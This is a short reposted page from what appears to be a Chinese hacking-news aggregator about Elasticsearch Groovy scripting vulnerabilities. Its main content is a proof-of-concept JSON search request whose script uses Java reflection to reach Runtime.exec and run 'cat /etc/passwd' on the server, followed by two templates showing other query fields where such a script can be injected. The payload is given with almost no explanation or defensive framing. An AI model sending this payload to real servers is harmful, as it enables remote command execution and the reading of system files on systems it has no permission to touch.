记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

elasticsearch scripting security issues

2015-03-05 21:20

elasticsearch scripting:

http://www.elasticsearch.org/guide/en/elasticsearch/reference/current/modules-scripting.html

security issues:

http://www.elasticsearch.org/community/security/

POC:

http://zone.wooyun.org/content/18915

{"size":1,"script_fields": {"iswin": {"script":"java.lang.Math.class.forName(\"java.io.BufferedReader\").getConstructor(java.io.Reader.class).newInstance(java.lang.Math.class.forName(\"java.io.InputStreamReader\").getConstructor(java.io.InputStream.class).newInstance(java.lang.Math.class.forName(\"java.lang.Runtime\").getRuntime().exec(\"cat /etc/passwd\").getInputStream())).readLines()","lang": "groovy"}}}

 

{
  "size": 1, 
  "query": {
    "function_score": {
      "script_score": {
        "script": "POC............",
        "lang": "groovy"
      }
    }
  }
}

 

{
    "size": 1, 
    "script_fields": {
        "my_field": {
            "script": "POC.........."
        }
    }
}

 

知识来源: javaweb.org/?p=1690

阅读:79512 | 评论:0 | 标签:Web Applications

想收藏或者和大家分享这篇好文章→复制链接地址

“elasticsearch scripting security issues”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

关注公众号hackdig,学习最新黑客技术

推广

工具

标签云

本页关键词